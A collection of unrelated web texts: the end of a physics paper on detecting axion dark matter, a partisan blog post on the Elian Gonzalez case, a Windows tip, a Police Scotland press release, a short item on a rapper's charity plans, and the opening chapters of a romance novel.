another check that the signal is correct. Even using the EDM coupling or the photon coupling could lead to interesting knowledge about the dark matter velocity profile including knowledge of local streams, as has been pointed out for ADMX [@Sikivie:1992bk; @Duffy:2006aa; @Hoskins:2011iv], because of the high frequency resolution. However when using the pseudoscalar nucleon coupling, Eqn. , we have something more, we have a directional detector so we learn information about the full velocity distribution of the dark matter.
It is very interesting that even this experiment can get close to the QCD axion over a very large range of axion masses and further can cover a large piece of ALP parameter space. Also, very importantly, the fundamental limit from magnetization noise can be reduced by using samples with larger volumes [@NMR; @paper]. This scheme could thus potentially allow detection of the QCD axion over an interesting range of higher masses through the use of improved magnetometers.
This NMR technique appears to have the capability to probe hitherto unconstrained ALP dark matter parameter space when the ALP couples to nuclear moments such as the electric dipole moment [@NMR; @paper] or the axial nuclear moment. While constraints from current laboratory experiments for these ALP induced nuclear moments are much weaker than astrophysical limits, this search for ALP dark matter probes regions well beyond these limits (see Fig. \[Fig:Nucleon\]).
Axial Electron Moment {#Sec: axial electron}
Much like the axial nuclear moment discussed above, ALPs can also couple to electrons through the third operator in giving rise to the interaction $$\label{eqn:gaee}
\mathcal{L} \supset g_\text{aee} \, \partial_{\mu}a \left( \bar{e} \gamma_5 \gamma^{\mu} e \right).$$ This coupling is very similar to the nucleon coupling in Eqn and leads to similar effects. The QCD axion generally has this coupling with $g_{aee} \sim \frac{1}{f_a}$, though it can be fine-tuned to zero. Astrophysics constrains $g_{aee} \lessapprox 10^{-10} \text{ GeV}^{-1}$ from bounds on the cooling of white dwarves [@Raffelt:2006cw]. This interaction also gives rise to spin dependent dipole - dipole forces between electrons. However, bounds from such searches are significantly weaker than the astrophysical limits on this coupling [@Dobrescu:2006au; @electronspin].
![ \[Fig:Electron\] ALP parameter space in pseudoscalar coupling of axion to electrons Eqn. vs mass of ALP. The green region is excluded by White Dwarf cooling rates from [@Raffelt:2006cw]. The blue region is excluded by searches for new spin dependent forces between electrons [@Dobrescu:2006au; @electronspin]. The region below the solid purple line shows the possible parameter space for a QCD axion, with the region bounded by darker purple lines being the region where the QCD axion could be all of dark matter and have $f_a < M_\text{pl}$. The frequency range of the QCD axion covered by ADMX is identical to the range plotted in Figure \[Fig:Nucleon\]. ](electronplot.pdf){width="6"}
Similar to the axial nuclear moment, in the presence of a background dark matter ALP field, the non-relativistic limit of this operator leads to the following term in the electron Hamiltonian $$H_e \supset g_{aee} \vec{\nabla} a.\vec{\sigma_e}$$ where $\sigma_e$ is the electron spin operator. An electron spin that is not aligned with the ALP dark matter “wind" will then precess due to the coupling $$\label{eqn: electron precession rate from gaee}
H_e \supset g_\text{aee} \, m_a \, a_0 \cos \left(m_a t\right) \, \vec{v}.\sigma_{e}$$ Using the constraint that the energy density in the ALP oscillations not exceed the local dark matter density, this perturbation is of size $$\label{eqn: numbers for electron precession rate from gaee}
\Delta E \sim g_\text{aee} \, | \vec{\nabla} a | \sim g_\text{aee} \, v \, \sqrt{\rho_{\text{DM}}} \sim 3 \times 10^{-9} \text{ s}^{-1} \, \left(\frac{g_{aee}}{ 10^{-9} \text{ GeV}^{-1}}\right) \left(\sqrt{\frac{\rho_{\text{DM}}}{0.3 \, \frac{\text{GeV}}{\text{cm}^3}}}\right)$$ This perturbation also oscillates at a frequency equal to the ALP mass $m_a \sim$ kHz - GHz, with an expected bandwidth $\sim 10^{-6} m_a$.
We have not been able to invent techniques that could probe this unconstrained parameter space of ALP dark matter. We show constraints on this coupling in Figure \[Fig:Electron\]. The solid purple line in the figure shows the largest value that $g_{\text{aee}}$ could take for the QCD axion. Since $g_{\text{aee}}$ is model dependent, it could in principle be tuned to zero, though it is generally expected to be close to the purple line. As in Figures \[Fig:EDM\] and \[Fig:Nucleon\] the darker purple portion shows the part of QCD axion parameter space where the axion may be all of the dark matter and has $f_a < M_\text{pl}$. In this figure this region is bounded by the solid dark purple on top and the dashed lines on the sides. For a general ALP, there is no such expectation and the coupling could lie anywhere on the unconstrained portion of Figure \[Fig:Electron\]. Experimental techniques to probe time varying electron axial moments could thus probe an unexplored range of ALP dark matter.
Conclusions {#Sec: conclusions}
All previous axion detection experiments have been based on the axion-photon coupling in Equation . We have considered several new operators for axion and ALP detection in Equations , , and in Sections \[Sec: EDM\], \[Sec: axial nuclear\], and \[Sec: axial electron\]. For the QCD axion the EDM operator arises from the axion-gluon coupling $\propto \frac{a}{f_a} G \tilde{G}$. We mapped out the parameter spaces for these operators including finding the current constraints in Figures \[Fig:EDM\], \[Fig:Nucleon\], and \[Fig:Electron\]. These operators suggest new ways to search for axion and ALP dark matter. For the EDM coupling we previously proposed an experiment using cold molecules [@Graham:2011qk]. These operators suggest promising detection strategies using spin precession, NMR-based, techniques which we discuss in detail in [@NMR; @paper]. For the QCD axion, high-scale decay constants $f_a$, or masses below $\sim \mu {\text{eV}}$, make up a well-motivated part of parameter space but are very challenging to detect with current experiments. Use of these new operators may allow detection of QCD axion dark matter over a wider range of its parameter space, especially for $f_a$ near the fundamental GUT or Planck scales. In particular the EDM operator Eq. may be the most promising. Because it is a non-derivative operator, it avoids the axion wavelength suppressions that plague the use of any other axion coupling for detecting low mass axions.
We have argued that it is useful to think of ALP dark matter produced through the misalignment mechanism as a classical field with an oscillating vacuum expectation value (VEV). The interaction of a single axion or ALP particle with a detector may be too weak to observe. But thinking of the ALP as a background field motivates searching for the coherent effects of the interaction of the entire classical scalar field with the detector. For example, as we have shown, the ALP field may cause an oscillating nucleon EDM proportional to the classical VEV of the field, a collective effect of all the ALP ‘particles’ comprising the field. Or the ALP field may induce axial moments for nucleons or electrons, causing their spins to precess around the gradient of the field.
The continuous, coherent nature of these effects also enable secondary tests that can confirm the ALP dark matter origin of a signal in such experiments. As pointed out in [@NMR; @paper], a signal in one sample can be correlated with another that is within the de-Broglie wavelength ($\gg 100$ m) of the ALP field. Further, a positive signal in a particular bin can be verified by tuning the experiment to that bin and spending additional time to observe the build up of the signal in that bin. Since the assumed scanning time at any particular frequency bin is rather short ($\sim 10$ s), additional time can be spent in some bins without significant loss of efficiency. As discussed earlier in Section \[Sec: axial nuclear\], the spin dependent nature of the ALP coupling to axial currents can be exploited to detect the direction of the dark matter wind for such ALPs. These effects are very different from the single, hard, particle scatterings which are used to search for WIMP dark matter. For WIMP direct detection the signal is a stochastic energy deposition event in the detector. The effects we propose searching for are not dominantly energy-deposition signals. They are the continuous, coherent effects of the entire ALP field on the sample.
We considered ways to search for axion or ALP dark matter. Similarly to ADMX, such signals benefit from requiring only one insertion of the small coupling between the axion or ALP and the Standard Model fields. These couplings, $g_{a\gamma\gamma}$, $g_d$, $g_\text{aNN}$, and $g_\text{aee}$ in Equations , , , and respectively, are exceedingly small. For the QCD axion they are all $\propto f_a^{-1}$, where $f_a$ is a high scale. By contrast, light-through-walls and spin-dependent force experiments require two insertions of these couplings. In such experiments the axion or ALP must be sourced (either by the laser or the source mass) and then must interact again to be detected. The Feynman diagram would have two insertions of this operator and so the amplitude for the process is suppressed by the relevant coupling squared. The light-through-walls experiments measure a rate and so are suppressed by the coupling to the fourth power. This is why experiments searching for axion or ALP dark matter such as ADMX or through the effects we propose are sensitive to significantly smaller couplings and may even reach the QCD axion.
We have proposed a new type of dark matter signal to search for: the rapid oscillation of some parameter, e.g. the nucleon EDM. In general, such a signal may arise from any type of modulus dark matter. The QCD axion provides a well-motivated example of such a modulus, but many others are possible. For example perhaps the dark matter is a modulus of electric charge, in which case the fine-structure constant would oscillate in time. Unlike the current experiments searching for time-variation of $\alpha$ which look on timescales of years or more, the most motivated variation is on much faster timescales, frequencies of $\sim$ kHz to GHz or more. Further, for definiteness here we have considered scalar fields. However it is also possible that other fields (e.g. vectors) may provide a natural realization of the experimental signatures we have considered.
Although we have considered some experimental designs to detect these signals of axion and ALP dark matter, it seems likely that many other experiments are also possible. For example, some static EDM experiments may be modifiable to search for oscillating EDMs. It would be valuable to make progress covering the ALP parameter spaces of Figures \[Fig:EDM\], \[Fig:Nucleon\], and \[Fig:Electron\] and reaching towards the QCD axion. Once we start considering the parameter space for this new type of signal, it becomes clear that there is a large, new class of dark matter direct detection experiments that have not been considered before.
Over the last couple decades, WIMP direct detection experiments have made tremendous progress, improving sensitivities by many orders of magnitude. A similar improvement in the search for axion dark matter may be possible with new experiments designed to search for the coherent field effects we have described. The axion is an excellent dark matter candidate. Hopefully consideration of these types of signals will open new avenues to its discovery.
Acknowledgments {#acknowledgments .unnumbered}
We would like to thank Dmitry Budker, Hooman Davoudiasl, Savas Dimopoulos, Micah Ledbetter, Yannis Semertzidis, Alex Sushkov, and Scott Thomas for useful discussions. SR was supported by ERC grant BSMOXFORD no. 228169.
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Apparently unsatisfied with his historic propaganda services for Castro’s Stalinist regime, ABC’s Jim Davila reported for duty again this week. Davila’s interview with 21 year old Elian Gonzalez is making major media waves.
The “interview,” by the way, was conducted from Cuba after Avila was (gleefully) granted a journalist visa by the Stalinist authorities—not that this could possibly influence the nature of Avila’s questions. And certainly not that most viewers of the alphabet media would notice anyway.
"I am his (Fidel Castro’s) friend but above all I consider him (Fidel Castro) my father, my grandfather. Fidel, he is an incredible person! I came to know Fidel. I began to see his kindness!” These were among the eye-opening scoops the hard-hitting Jim Avila was able to coax from Elian Gonzalez.
Forget the crumbling buildings and trashy streets of Havana nowadays, amigos. All those who’ve experienced it know that the true horror of Communism is -- not what it does to a nation's infrastructure--but what it does to the mind, soul and spirit of its subjects.
"To the American people, first I say thank you for the love they give me. I want the time to give my love to American people," continued the 21 year-old Elian.
That love, by the way, was displayed when (then) Deputy Attorney General Eric Holder concocted the “legal” cover for heavily-armed Federal troopers to mace, kick and gun-butt their way into Lazaro Gonzalez’ Miami home on the morning of April 22, 1980, wrench a bawling 6 year old Elian from his family at machine-gun point, and bundle him off to a Stalinist nation.
The Federal troopers left 102 people injured some seriously. Many of the injured were ladies who had brandished dangerous weapons. Worse, they had displayed these weapons openly, threateningly. These weapons were rosaries.
I wrote “Davila’s propaganda services for Castro to date” because back in April 2000 Avila (from Havana) was busily earning his Cuba visa: "Why did Elian’s mother leave Cuba?” the furrow-browed Avila asked the (then) NBC cameras. “What was she escaping? By all accounts this young woman was living the good life.”
Would it occur to a presumably educated reporter to ask why someone tried sneaking over or under the Berlin Wall? Of course not. They’d be laughed off the screen. But as usual, the same thundering imbecility goes unnoticed with regards to escaping a Soviet-Bloc prison-nation in the Caribbean.
Some perspective on that “good life:” Between two and three hundred people (out of an average population over the decades of 18 million) died trying to breach the Berlin Wall or otherwise escape East Germany. Between sixty-five and eighty thousand people (out of an average population of 8 million over the decades) have died trying to escape Castro’s Cuba.
What makes these stats more horrific still is that prior to Castroism very few Cubans left Cuba. Indeed, prior to Castroism Cuba was swamped with more immigrants per-capita than the U.S., mostly from Europe. People from nearby Haiti jumped on rafts desperate to enter Cuba, which enjoyed a higher standard of living than much of Europe. Also, during the 1950’s when all Cubans were perfectly free to emigrate with all family, property, etc., and U.S. visas were issued to them for the asking, about the same number of Americans lived in Cuba as Cubans in the U.S. In 1953 more Cubans vacationed (then voluntarily went home) from the U.S. than Americans vacationed in Cuba.
Alas none of this features in The Godfather II. So it’s mostly unknown.
There was nothing crude or sloppy about Elian’s kidnapping by Bill Clinton’s agents. Like most major Castro-KGB propaganda operations—from Castro and Che Guevara’s (bogus) guerrilla war against Batista’s army, to Castro’s (bogus) fealty to the principles of Thomas Jefferson, to the( bogus) five gazillion assassination attempts against Castro by the CIA, to Cuba’s free and fabulous (and bogus) health-care to the (bogus) embargo that “cruelly starves the Cuban people. ..blah…blah”–as in all these immensely successful hoaxes, for the Elian-kidnapping Castro again enlisted the U.S. media as his ever-faithful propaganda arm. And again most Americans swallowed it.
For the Elian swindle Dan Rather and CBS (again) volunteered their invaluable services. Thanks to this ritual media-Democratic-Castroite collusion, most Americans missed the crucial legal and ethical details of the Elian Gonzalez circus/tragedy — which were mostly established during the first week after Elian’s rescue at sea, after his heroic mother’s drowning.
The “son-belongs-with-his-father” crowd, for instance, “missed” that Elian’s father was initially delighted that his motherless son was in the U.S. and in the loving arms of his uncles and cousins. The evidence — frantically buried by the media-Democratic-Castroite complex — was overwhelming. Mauricio Vicent, a reporter for Madrid newspaper El Pais, wrote that during that first week he’d visited Elian’s hometown of Cardenas and talked with Elian’s father, Juan Miguel, along with other family members and friends. All confirmed that Juan Miguel had always longed for his son Elian to flee to the United State. Shortly after Elian’s rescue, his father had even applied for a U.S. visa!
“Juan Miguel Gonzalez was surrounded by Castro security agents the entire time he was in the studio with Rather.” This is an eye-witness account from Pedro Porro, who served as Dan Rather’s translator during the famous 60 Minutes interview. Dan Rather would ask the question in English into Porro’s earpiece whereupon Porro would translate it into Spanish for Elian’s heavily-guarded father.
“Juan Miguel was never completely alone,” says Porro. “He never smiled. His eyes kept shifting back and forth. It was obvious to me that he was under heavy coercion. I probably should have walked out. But I’d been hired by CBS in good faith and I didn’t know exactly how the interview would be edited – how it would come across on the screen.
“The questions Dan Rather was asking Elian’s father during that 60 Minutes interview were being handed to him by attorney ( and Clinton friend) Gregory Craig,” continues Pedro Porro. “It was obvious that Craig and Rather where on very friendly terms. They were joshing and bantering back and forth, as Juan Miguel sat there petrified. Craig was stage managing the whole thing – almost like a movie director.”
Remember Godfather II? Remember the Senate hearings where Frankie Pentangeli, under FBI protection, was prepared to testify against Michael Corleone? The stage was set. Looked like a done-deal for the Feds. Then Frankie looks up and sees his bewildered brother Vincenzo from Sicily, sitting next to Mikey.
Whoops! Frankie sure changed his tune, didn’t he?
Think of Elian’s father Juan Miguel Gonzalez as Frankie Pentangeli at the time. The gun Fidel Castro held to Juan Miguel’s head was as invisible (to those without experience with Communism) as the one Mikey held to Pentangeli’s head was to most spectators at those hearings. | {
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The virtual desktops feature in Windows 10 is called “Task View” and is located on the Taskbar. Soon you will see how using virtual desktops is a fantastic way of organizing your work into separate manageable areas, each specific to the task at hand. Here's how to utilize this feature. | {
"pile_set_name": "Pile-CC"
} |
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Standards of Service for Victims and Witnesses published
Published 30 April 2019
On Tuesday 30th April 2019 the Standards of Service for Victims and Witnesses 2019-2020 was published along with the Standards of Service for Victims and Witnesses Annual Report 2018-2019 both of which can be can be viewed on our Standards of Service for Victims and Witnesses page.
The Standards of Service provides a structure for the Scottish criminal justice partners to embed and reinforce standards to improve the experience of victims and witnesses in the criminal justice system in line with the principles of the Victims and Witnesses (Scotland) Act 2014.
This is the fourth year in which Police Scotland has worked in close partnership with the Crown Office and Procurator Fiscal Service, the Scottish Courts and Tribunal Service, the Scottish Prison Service and the Parole Board for Scotland to outline how we are performing against the standards and makes clear what victims and witnesses should expect from the Scottish criminal justice system over the coming year. The development and publication of the Standards of Service is based on informed feedback and makes clear our achievements and challenges.
“The level of service we provide to victims and witnesses from first point of contact through to resolution is important to us all and is paramount to our service delivery. It is crucial we get it right from the beginning.
Victims and witnesses should feel confident to come forward and report crimes and be clear on what to expect from Police Scotland when they do so.
We recognise victims and witnesses are individuals who must be treated as such. Their needs, expectations and overall experience of the criminal justice system can be influenced, positively or negatively, by their initial contact with the police.
Our officers and staff, with support from their line management, continue to work hard to ensure we meet the commitments within the standards of service and we aim to consistently deliver a high level of service to victims and witnesses of crime.
We will focus on staff behaviour, attitudes and leadership to improve our performance where required as highlighted in this year’s Annual Report.” Cabinet Secretary for Justice Humza Yousaf said in support of this publication:
“We recognise that having to engage with the criminal justice system can be a challenging and traumatic experience for victims and witnesses. We want to ensure that a victim-centred approach, developed and backed by partners, can improve the way we communicate, support and treat victims throughout their contact with the system.
To this end, last year we launched the Victims Taskforce, bringing together senior decision-makers from justice agencies and the voluntary sector, including those who directly represent victims. The Taskforce is working to make sure the voices of victims are heard, and that their experiences with the justice system improve.
I welcome today’s Service Standards Report which is a reflection of the commitment across justice agencies to ensuring the way victims and witnesses are treated is at the core of our approach, and the Scottish Government will continue to work closely with the sector to deliver progress.”
The publication of these shared documents demonstrates our collective commitment to work together for victims and witnesses.
Contact Details
Call 101 for non-emergencies and general enquiries, in an emergency call 999. If you have information about a crime you can also contact Crimestoppers anonymously on 0800 555 111. | {
"pile_set_name": "Pile-CC"
} |
XXXTentacion was worrying about helping others in the last minutes of his life, and unfortunately will never get to complete the work he was so passionate about.
Sources close to the situation tell us the “Moonlight” rapper was quietly planning several charity events and trying to line them up for the immediate future. Specifically, he was aiming at raising awareness regarding suicide prevention and delivering the message to his young fans.
Suicide prevention was something extremely important to XXX, who once publicly revealed he lost a female friend after she took her life during a visit to the rapper. That girl was named Jocelyn Flores, and XXX named a song in her memory. | {
"pile_set_name": "Pile-CC"
} |
# Moonstone Beach
### The Main Street Merchants, Book 1
## Linda Seed
### Contents
Get a Linda Seed short story FREE
By Linda Seed
Chapter 1
Chapter 2
Chapter 3
Chapter 4
Chapter 5
Chapter 6
Chapter 7
Chapter 8
Chapter 9
Chapter 10
Chapter 11
Chapter 12
Chapter 13
Chapter 14
Chapter 15
Chapter 16
Chapter 17
Chapter 18
Chapter 19
Chapter 20
Chapter 21
Chapter 22
Chapter 23
Chapter 24
Read more of the Main Street Merchants series
Read the Delaneys of Cambria series
Read the Russo Sisters series
# Get a Linda Seed short story FREE
Sign up for Linda's no-spam newsletter to read more about Kate and Jackson in the Main Street Merchants short story "Jacks are Wild." Your information will never be shared or sold. Grab your free story here.
# By Linda Seed
Moonstone Beach
Cambria Sky
Nearly Wild
Fire and Glass
* * *
A Long, Cool Rain
The Promise of Lightning
Loving the Storm
Searching for Sunshine
* * *
Saving Sofia
First Crush
This is a work of fiction. Any characters, organizations, places, or events portrayed in this novel are either products of the author's imagination or used fictitiously.
* * *
Published by Linda Seed, Copyright **©** 2015
* * *
All rights reserved. No part of this book may be reproduced in any form or by any means without the prior written consent of the author, excepting brief quotes used in reviews.
* * *
This ebook is licensed for your personal enjoyment only. This ebook may not be re-sold or given away to other people. If you would like to share this book with another person, please purchase an additional copy for each recipient. If you're reading this book and did not purchase it, or it was not purchased for your enjoyment only, then please return to Smashwords.com or your favorite retailer and purchase your own copy. Thank you for respecting the hard work of this author.
* * *
The author is available for book signings, book club discussions, conferences, and other appearances.
Linda Seed may be contacted via email at [email protected], on Facebook at www.facebook.com/LindaSeedAuthor, or on Twitter at www.twitter.com/LindaSeedAuthor.
* * *
Cover design by Kari March
Created with Vellum
_For John_
_Now and always_
# 1
"Well, look what the cat dragged in."
Althea Morgan, sales assistant at Swept Away, peered with disdain at Kate Bennet, the bookstore's owner, as Kate hurried into the store. "I expected you at nine. And here it is... " She checked her watch. "... Almost _nine forty-two_." The woman had her fists planted on her impossibly narrow hips, and her lips were pursed, causing unsightly lines to form around her mouth. "We've had a rush, and I had to get orders ready to ship, and I didn't know _when_ you were going to come in, so I had to tell Mr. Belmont that I—"
"Althea." Kate had barely gotten in the door, and she was still balancing a stack of books and her purse in her arms.
"Now, I know it's probably not my business, but—"
" _Althea_."
"I'm just saying, it wouldn't hurt you to _call_ —"
The older woman looked at Kate as though she'd suddenly been awakened from a nap during the REM cycle. She blinked several times, her brightly lipsticked mouth slack.
"I'm sorry I'm late, but I had some things to attend to. It was inconsiderate of me, you're right. I apologize." Kate smiled in what she hoped was a winning way. She teetered over to the counter on heels that were too high and put down her things with a sigh of relief.
Althea, who would not reveal her age but was probably somewhere in her late sixties, patted her dark-dyed helmet of hair and straightened the flowing turquoise silk jacket she was wearing over white capris and a white tank. "Well. It just seems to me that as the _owner_ , you should try to set some sort of _example_...."
"You're right. I'm sorry," Kate said again.
"I just..."
"Did Elliot call? I was expecting to hear from him about our quarterly taxes." In fact, Kate hadn't expected to hear from her accountant, but she hoped that an abrupt change of subject would derail Althea's criticisms. Once Althea got going, it was difficult to stop her by direct means.
"He might have. I've just been so _busy_ trying to do everything alone, I didn't even have time to check the phone messages," Althea fussed.
Kate waited until Althea turned away, then rolled her eyes. Kate's friends who ran the shops on either side of her had urged her to stop placating Althea and fire the ill-tempered old bat—show her who ran the place once and for all—but the truth was that Kate couldn't bring herself to do it. Althea knew books. She often knew what Kate needed done before Kate knew it herself. But most importantly, Althea had been hired by Kate's mother, back when Lydia Bennet had built the business from nothing more than a dream. Lydia was gone now, but the spirit of what she had made here remained. So Althea stayed, and Kate soothed and apologized.
"Those shoes probably slow you down." Althea pointed a heavily lacquered fingernail toward Kate's feet. "They are lovely, though."
Kate stuck out one foot and turned it this way and that, displaying it for Althea's approval. "They are, aren't they? I'm not the best with three-inch spikes, but they were half price. I think I just need practice."
Althea's lips pursed tightly. "Just make sure you don't break an ankle while you're practicing. With you in a cast, you wouldn't be able to do _anything_ around here. Though, I can't see how that would be much different.... "
Kate pretended not to hear that last insult. She carried her books and her bag into the tiny back room, which was stacked with rare volumes, remainders, and damaged books that needed to be returned or repaired. She took a deep breath and inhaled the scent of old pages mixed with the briny smell of the ocean. It was an aroma that always made her happy.
_This will never get old._
She ran a hand through her shoulder-length dark hair to smooth it and emerged into the front room of the store. The shop was small, with floor-to-ceiling bookshelves crammed with every possible genre: mystery, romance, literary novels, biography, history, and more. The hardwood floors and dark wood shelves created the sense that you'd gone back in time, to a library in an English country house that had seen better days but was, nonetheless, much loved. One middle-aged man in Bermuda shorts, a tank top, and wide leather sandals was browsing through the James Pattersons. Other than that, the place was empty except for Jane Austen, the Swept Away cat. This was what Althea called a rush?
"Good morning," Kate said warmly to the guy in the Bermudas. "Welcome to Swept Away. Is there anything I can help you find?"
"Oh, no thanks, I'm just browsing," he said.
"Of course. Used mystery and crime paperbacks are buy one get one free all this week."
The guy brightened. "Hey! Thanks."
He selected four books for a total of $4.75 plus tax. Kate finished the sale, put the books into a bag, and wished the guy a lovely time in Cambria.
He was barely out the door before it burst open again, the bell attached to the top jingling in panic. A stunning woman with long, blond hair piled into a messy bun on the top of her head exploded into the room, her arms flying.
"Kate! You're here! What took you so long? Red alert! Red alert!"
Kate's eyebrows shot up. "Really?"
Lacy Jordan rushed behind the counter, grabbed Kate's arm, and yanked her toward the door. "Would I lie to you about a red alert?"
"Well, no. Where? Where?"
"In my shop! Hurry!"
Lacy was still wearing the coffee-stained apron she sported while serving customers at the espresso place next door. Her sneakers, with faded jeans and a tight white T-shirt, allowed her more freedom of movement than Kate had in her heels and pencil skirt.
"Oh, come on!" Lacy urged. "Why would you wear those shoes when you know there might be a red alert?"
"I guess I wasn't thinking," Kate said.
"I guess not!"
Kate click-clacked as quickly as she could across the sidewalk and past a pair of tourists, until Lacy thrust her by the arm through the door of Jitters, the coffee bar where Lacy worked. The force with which Lacy propelled her through the door caused Kate to teeter on the heels before finally righting herself.
"Where?" she whispered, out of breath.
"Left rear corner."
Kate looked around the room until her eyes rested on the man sitting at a small, round café table, sipping something from a white ceramic cup.
"Oh," she breathed.
It was him, all right. The first spotting had been three days earlier, at the wine tasting bar run by Rose Watkins, the third of their foursome of friends. The guy, a cross between David Beckham and Chris Hemsworth, was such a ticking bomb of sex appeal that Rose had immediately and surreptitiously called all of them over from their respective places of business to come in and get a look at him. After some discussion, they'd decided that he would be the perfect practice man for Kate, who—two years post-divorce—had recently decided she was ready to start dating again. Flirting was the first step, and who better to flirt with than a guy who could be a Calvin Klein underwear model?
The "red alert" system had been created to deal with any future sightings—not only so Kate could polish up skills that had suffered from disuse, but also so the other women could get another chance to bask in his glory.
"Did you call Rose and Gen?" Kate was whispering out of the side of her mouth, all systems in stealth mode, though Mr. Beautiful likely couldn't hear them from where he sat.
"Gen's not at the gallery, and Rose is stuck doing a tasting for a big group." She sighed. "He's all ours."
"Wow." They stood together, thinking. "Well, I'm just gonna start with a stroll to the ladies' room. Just a little fly-by. Get a better look," Kate said.
Lacy clapped her on the back companionably. "Good plan."
Kate took a deep breath and squared her shoulders. "Wish me luck. I'm going in."
She did one or two cleansing breaths and then started to walk casually toward the back of the shop. Just a woman on her way to the restroom. Nothing unusual going on here at all. The trick was to look at him while pretending not to look at him. He was facing away from her now, so the stealthy looking probably would work best on the way back.
As she passed, he was looking down at a newspaper that was folded next to his coffee mug. Black T-shirt stretched across a muscular back. Three-day scruff of beard. Black hair still wet. From a shower? From a dip at the beach? From surfing? Oh, surfing. She pictured him in a skin-tight wetsuit, hair dripping with ocean water. Yum.
It was this train of thought Kate was following—just as she was passing Mr. Beautiful's table—when the heel of her left shoe went into a groove of the fashionably rough-hewn wood floor, causing her to pitch forward. She pinwheeled her arms desperately to regain her balance, but it wasn't enough to keep her from colliding with the floor with a loud _whump_.
She was still lying there, trying to figure out how best to get up and maintain her dignity—though it was obviously too late for that—when she looked up and saw Mr. Beautiful looming over her.
"Are you okay?" He offered her a hand, but his eyes were drifting lower. She looked down and realized that her skirt had ridden up in the fall, exposing about three-fourths of her thighs.
"Um, yeah. Everything still works, I think." She blushed furiously. She slapped at her skirt to put it back into place as she took his hand and got to her feet. "Thanks."
"You'd better have a seat. Take a minute to regroup." He pulled out a seat at his table and ushered her into it. "I'm Zach." He offered her the hand she'd only moments ago released.
"Kate." They shook. His grip was firm, his palm cool and smooth. "Hey, look. I should go. I don't want to interrupt you in the middle of your..." She waved her hand vaguely. "Your cappuccino and your newspaper and..." More vague waving. "... And whatever it was you were doing."
He nodded sagely. "Cappuccino and newspaper do require a lot of concentration." One corner of his mouth quirked up in a sexy smile.
"Well." She blushed again. She could feel the red wave of her embarrassment start at her neck and move up toward her hairline.
"Can I buy you a coffee?" he offered.
"Oh. I..." Before she could answer, Lacy called over from behind the counter.
"I've got your regular going, Kate! Soy latte, extra foam. Coming up!"
That woman could eavesdrop from the next town during a thunderstorm.
"Well, I guess that settles it," he said. "You sure you didn't hurt yourself? That was quite a fall."
"I'm sure. Just embarrassed. I'm such an idiot. It's these shoes. They're torture devices."
He peered down at her shoes—fire engine red pumps with pointed toes and stiletto heels—and let out a long whistle. "I've got to think they're worth the trouble."
"Well, that's the hope, anyway." She crossed her legs and watched him watch them. "Are you in town visiting?"
He nodded, taking a sip of his cappuccino. He licked a bit of foam from his upper lip, and Kate felt her own mouth go dry. "Yeah. Just taking a little vacation. I'm staying at a B&B on the beach. The Central Coast is beautiful this time of year."
"It's beautiful any time of year."
Lacy came over with Kate's latte. She set the drink on the table and shot Kate a wink before hurrying away.
"Cambria was my wife's favorite place."
_Wife? Was?_ She tried to figure out how to ask. "Is she..."
"We're divorced."
"Ah. Me too." Kate felt relieved that she hadn't stumbled onto a grieving widower. It would be a shame if she'd crashed into the hardwood only to have to console him while he cried and showed her pictures of the wedding.
No sooner had she thought it than he pulled a phone from his back pocket and scrolled through his photos before showing one to Kate. "Here she is. This is Sherry." His voice sounded wistful as he offered the phone to Kate.
"Wow." The woman in the photo was supermodel gorgeous, with long, silky black hair, eyes the color of espresso, and flawless skin the shade of warm caramel. Kate would not have been surprised to see a tiara and a sash. "She's beautiful."
"Yeah." He took the phone back and replaced it in his pocket. "We spent our honeymoon here."
"In Cambria?"
"In the same B&B."
Kate looked at him blankly. "Oh. And you came here because..."
"I guess I just wanted to feel close to her again." A tear came to his eye, and he brushed it away.
This encounter was so clearly going nowhere that Kate tried to think of a graceful way to excuse herself. With exquisite timing, Althea came bursting through the doorway of the café.
"Kate!" the older woman boomed, her face red, looking pissed-off.
"Oops. I'm so sorry, I have to get going," she told Mr. Beautiful, whom she now thought of as Mr. Sad and Beautiful. "I have to get back to work. I work next door. At the bookshop. I mean, I own it. The bookshop. I... Um. Bye. It was really nice to meet you."
She grabbed her latte cup and click-clicked with tiny little steps (all her pencil skirt would allow) toward the door. "I'm coming, Althea. Bye, Lacy! I'll see you later!"
Lacy shot her a questioning look, a _why are you leaving without a wedding date or at least a phone number_ kind of glare. Kate put her thumb and pinkie to her face in the universal gesture of _call me_. Then she followed Althea out the door.
"Why, first you're late, and then you rush out the door in some kind of 'red alert' nonsense," the older woman was going on. "Sometimes it's like you don't take your work seriously at all, Katherine. I mean, it's beyond me. Your mother would never..."
Kate let her go on, barely listening.
Her cell phone was ringing on the bookstore's counter before Kate was even all the way inside.
"What happened? Why did you leave?"
Kate could hear espresso machines whirring and milk steamers hissing in the background.
"Yeah, that one's not gonna work out," Kate said.
"Why not? Is he too good looking? Is that it? Is the splendor of his beauty too much for your eyes?"
"He's mourning his wife."
"Oh. Yikes. Dead?"
"Divorced. He's here to relive their honeymoon. Alone. He showed me her picture."
Lacy was silent for a moment. "Yeah, that's not going anywhere."
"No." With the phone to her ear, Kate started leafing through a pile of paperwork Althea had thrust in front of her. With dismay she noted that it was mostly bills.
"It's too bad," Lacy mused. "That pratfall of yours was pure genius. Part Julia Roberts, part Lucille Ball. I'm in awe. I'm so proud. I'm like a proud mama."
"I'd like to say I did it on purpose, but..."
"What?" Lacy called out. "What? I can't hear you over the espresso machine! I can't acknowledge a single thing you just said! I have to go! Bye, hon!"
# 2
The next morning, Kate woke to the sound of someone rummaging around in her kitchen, banging cabinet doors and sifting through the silverware drawer. Groggy, she looked at the clock. Six thirty-two. Pale sunlight filtered through the white linen curtains above the bed. She rolled over and tried to go back to sleep, but then she started to smell coffee, which made it impossible. Damn it.
Squinty-eyed, she emerged from the bedroom to find Genevieve Porter pouring herself a mug of black coffee in Kate's tiny kitchen.
"You run out again?" She rubbed her eyes and yawned.
"Yeah. I hope you don't mind. You always have better coffee than I do, anyway."
"Mi casa es... something. It's too early for foreign languages." Kate took a thick ceramic mug from the cupboard above the coffee pot and poured herself a cup. She added cream and an obscene amount of sugar. That first sip tasted like sweet salvation.
"Ah, God. I want to be mad at you for waking me up at six-something-ridiculous, but you made me coffee. So there's that."
